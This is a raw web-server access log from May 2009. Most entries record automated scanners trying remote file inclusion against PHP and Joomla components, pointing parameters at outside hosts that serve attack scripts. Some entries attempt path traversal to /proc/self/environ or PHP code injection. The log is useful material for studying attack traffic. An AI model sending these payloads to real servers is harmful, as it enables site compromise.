211.110.19.178 - - [14/May/2009:11:03:22 -0500] "GET /logs/access_log.1231718400//setup.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:11:03:22 -0500] "GET /logs//setup.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.110.19.178 - - [14/May/2009:11:04:21 -0500] "GET /logs/access_log.1233964800//setup.php?%20dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:11:07:17 -0500] "GET /logs//error.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:11:07:17 -0500] "GET //error.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.239.76.25 - - [14/May/2009:11:07:17 -0500] "GET /logs/access_log.1231718400//error.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.227.63.136 - - [14/May/2009:11:07:22 -0500] "GET /logs/access_log.1233187200/config/dbutil.bck.php?confdir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
212.227.63.136 - - [14/May/2009:11:07:22 -0500] "GET /config/dbutil.bck.php?confdir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
212.227.63.136 - - [14/May/2009:11:07:22 -0500] "GET /logs/config/dbutil.bck.php?confdir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
209.90.91.245 - - [14/May/2009:11:07:50 -0500] "GET /logs//include/lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.822"
209.90.91.245 - - [14/May/2009:11:07:50 -0500] "GET //include/lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.822"
212.227.63.136 - - [14/May/2009:11:07:55 -0500] "GET /logs/access_log.1236038400/config/dbutil.bck.php?confdir=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
69.94.30.156 - - [14/May/2009:11:08:33 -0500] "GET /logs//////////?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 189330 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:11:08:34 -0500] "GET //////////?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 200 3253 "-""libwww-perl/5.805"
222.239.76.25 - - [14/May/2009:11:08:35 -0500] "GET /logs/access_log.1233964800//error.php?%20dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.97.132.101 - - [14/May/2009:11:09:05 -0500] "GET /logs/access_log.1238112000/////?page=http://sikao.freehostia.com/id.txt?%0D?? HTTP/1.0" 404 302 "-""libwww-perl/5.53"
212.97.132.101 - - [14/May/2009:11:09:05 -0500] "GET /////?page=http://sikao.freehostia.com/id.txt?%0D?? HTTP/1.0" 200 3236 "-""libwww-perl/5.53"
212.97.132.101 - - [14/May/2009:11:09:06 -0500] "GET /logs/////?page=http://sikao.freehostia.com/id.txt?%0D?? HTTP/1.0" 200 188991 "-""libwww-perl/5.53"
69.94.30.156 - - [14/May/2009:11:09:21 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
69.94.30.156 - - [14/May/2009:11:09:21 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.foolsofoz.com//rox.gif? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
66.219.97.207 - - [14/May/2009:11:10:53 -0500] "GET /logs//include/lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
66.219.97.207 - - [14/May/2009:11:10:54 -0500] "GET //include/lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
64.118.90.253 - - [14/May/2009:11:10:57 -0500] "GET /logs//include/lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.823"
64.118.90.253 - - [14/May/2009:11:10:57 -0500] "GET //include/lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.823"
24.39.162.98 - - [14/May/2009:11:12:40 -0500] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
24.39.162.98 - - [14/May/2009:11:12:40 -0500] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
24.39.162.98 - - [14/May/2009:11:12:41 -0500] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
24.39.162.98 - - [14/May/2009:11:12:41 -0500] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
74.215.112.158 - - [14/May/2009:11:13:41 -0500] "GET / HTTP/1.1" 200 3245 "http://www.jayp.net/fhp/links.html""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
74.215.112.158 - - [14/May/2009:11:13:41 -0500] "GET /icons/back.gif HTTP/1.1" 200 216 "http://fortpit.pconline.com/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
190.144.44.36 - - [14/May/2009:11:13:41 -0500] "GET /logs/access_log.1238716800//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:11:13:41 -0500] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:11:13:41 -0500] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
74.215.112.158 - - [14/May/2009:11:13:41 -0500] "GET /icons/blank.gif HTTP/1.1" 200 148 "http://fortpit.pconline.com/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
74.215.112.158 - - [14/May/2009:11:13:41 -0500] "GET /icons/image2.gif HTTP/1.1" 200 309 "http://fortpit.pconline.com/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
74.215.112.158 - - [14/May/2009:11:13:41 -0500] "GET /icons/folder.gif HTTP/1.1" 200 225 "http://fortpit.pconline.com/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
74.215.112.158 - - [14/May/2009:11:13:41 -0500] "GET /icons/text.gif HTTP/1.1" 200 229 "http://fortpit.pconline.com/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
74.215.112.158 - - [14/May/2009:11:13:41 -0500] "GET /favicon.ico HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
190.144.44.36 - - [14/May/2009:11:13:45 -0500] "GET /logs/access_log.1235088000//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:11:13:55 -0500] "GET /logs/access_log.1235001600//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:11:15:24 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:11:15:24 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:11:15:24 -0500] "GET /logs/access_log.1236643200//admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
190.144.44.36 - - [14/May/2009:11:15:52 -0500] "GET /logs/access_log.1236988800//admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fatal2009/images/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
91.202.4.158 - - [14/May/2009:11:16:16 -0500] "GET /install/index.php?lng=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
91.202.4.158 - - [14/May/2009:11:16:16 -0500] "GET /logs/install/index.php?lng=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
91.202.4.158 - - [14/May/2009:11:16:16 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.202.4.158 - - [14/May/2009:11:16:16 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
91.202.4.158 - - [14/May/2009:11:16:17 -0500] "GET /logs/install/index.php?lng=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 305 "-""XXXXXX"
91.202.4.158 - - [14/May/2009:11:16:17 -0500] "GET /install/index.php?lng=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 300 "-""XXXXXX"
91.202.4.158 - - [14/May/2009:11:16:17 -0500] "GET /logs/install/index.php?lng=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""XXXXXX"
91.202.4.158 - - [14/May/2009:11:16:17 -0500] "GET /install/index.php?lng=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""XXXXXX"
200.54.154.10 - - [14/May/2009:11:17:21 -0500] "GET /logs/password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:17:21 -0500] "GET /password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:17:24 -0500] "GET /logs/password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:17:25 -0500] "GET /password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:17:25 -0500] "GET /logs/password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:17:25 -0500] "GET /password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:17:59 -0500] "GET /logs/password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:18:00 -0500] "GET /password.php?root_folder_path=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
116.50.163.164 - - [14/May/2009:11:20:05 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://208.98.22.241/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
116.50.163.164 - - [14/May/2009:11:20:05 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://208.98.22.241/id.txt??? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
66.232.102.70 - - [14/May/2009:11:20:49 -0500] "GET //?_zb_path=http://flyozoneusa.com/tmp/ide.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
66.232.102.70 - - [14/May/2009:11:20:50 -0500] "GET /logs//?_zb_path=http://flyozoneusa.com/tmp/ide.txt??? HTTP/1.1" 200 189322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.160.201.12 - - [14/May/2009:11:22:39 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:11:22:40 -0500] "GET /logs/access_log.1240531200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:11:22:40 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.73.129.21 - - [14/May/2009:11:24:02 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dbmotorbrokers.com/images/Vanquish/id.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
69.73.129.21 - - [14/May/2009:11:24:02 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dbmotorbrokers.com/images/Vanquish/id.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
212.150.52.114 - - [14/May/2009:11:24:53 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:24:53 -0500] "GET /logs//include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:24:53 -0500] "GET //include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:24:55 -0500] "GET //include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:24:55 -0500] "GET /logs//include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:24:55 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:25:09 -0500] "GET //include/lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:25:09 -0500] "GET /logs//include/lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:25:09 -0500] "GET /logs/access_log.1236297600//include/lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:25:09 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:25:13 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
212.150.52.114 - - [14/May/2009:11:25:15 -0500] "GET /logs/access_log.1234828800//include/lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.57.79.26 - - [14/May/2009:11:28:09 -0500] "GET /logs/environment.php?DIR_PREFIX=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.825"
207.57.79.26 - - [14/May/2009:11:28:09 -0500] "GET /environment.php?DIR_PREFIX=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
61.67.196.130 - - [14/May/2009:11:29:21 -0500] "GET //components/errors.php?error=http://www.oby.ch/cache/newscan1id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
61.67.196.130 - - [14/May/2009:11:29:21 -0500] "GET /logs//components/errors.php?error=http://www.oby.ch/cache/newscan1id.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
91.121.210.42 - - [14/May/2009:11:29:54 -0500] "GET /logs//include/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
91.121.210.42 - - [14/May/2009:11:29:54 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
91.121.210.42 - - [14/May/2009:11:29:54 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
91.121.210.42 - - [14/May/2009:11:29:54 -0500] "GET //include/write.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:11:30:28 -0500] "GET /logs/htmltonuke.php?filnavn=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:11:30:29 -0500] "GET /htmltonuke.php?filnavn=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:11:30:29 -0500] "GET /logs/access_log.1240012800/htmltonuke.php?filnavn=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.160.201.12 - - [14/May/2009:11:30:29 -0500] "GET /logs/access_log.1240617600/htmltonuke.php?filnavn=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
77.221.130.2 - - [14/May/2009:11:30:55 -0500] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
77.221.130.2 - - [14/May/2009:11:30:55 -0500] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
77.221.130.2 - - [14/May/2009:11:30:55 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.2 - - [14/May/2009:11:30:55 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
65.55.208.135 - - [14/May/2009:11:31:19 -0500] "GET /logs/access_log.1219968000 HTTP/1.1" 200 2222 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.135 - - [14/May/2009:11:31:20 -0500] "GET /logs/access_log.1151625600 HTTP/1.1" 200 660 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
171.64.75.45 - - [14/May/2009:11:32:14 -0500] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:11:32:14 -0500] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:11:32:48 -0500] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:11:32:48 -0500] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:11:32:49 -0500] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:11:32:49 -0500] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:11:33:00 -0500] "GET /logs/index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
171.64.75.45 - - [14/May/2009:11:33:00 -0500] "GET /index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
61.67.196.130 - - [14/May/2009:11:33:16 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.oby.ch/cache/newscan1id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
61.67.196.130 - - [14/May/2009:11:33:17 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.oby.ch/cache/newscan1id.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
200.54.154.10 - - [14/May/2009:11:34:09 -0500] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:34:09 -0500] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:34:10 -0500] "GET /logs/op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:34:10 -0500] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:34:10 -0500] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
200.54.154.10 - - [14/May/2009:11:34:11 -0500] "GET /op=*year=*month=/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
219.94.148.39 - - [14/May/2009:11:34:14 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:11:34:14 -0500] "GET /logs/access_log.1230768000//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:11:34:14 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
219.94.148.39 - - [14/May/2009:11:34:14 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://sk8sunabe.heteml.jp/mt/mt-static//numpang/fx29id2.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
84.32.195.2 - - [14/May/2009:11:34:23 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [14/May/2009:11:34:23 -0500] "GET /logs/access_log.1239321600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [14/May/2009:11:34:23 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
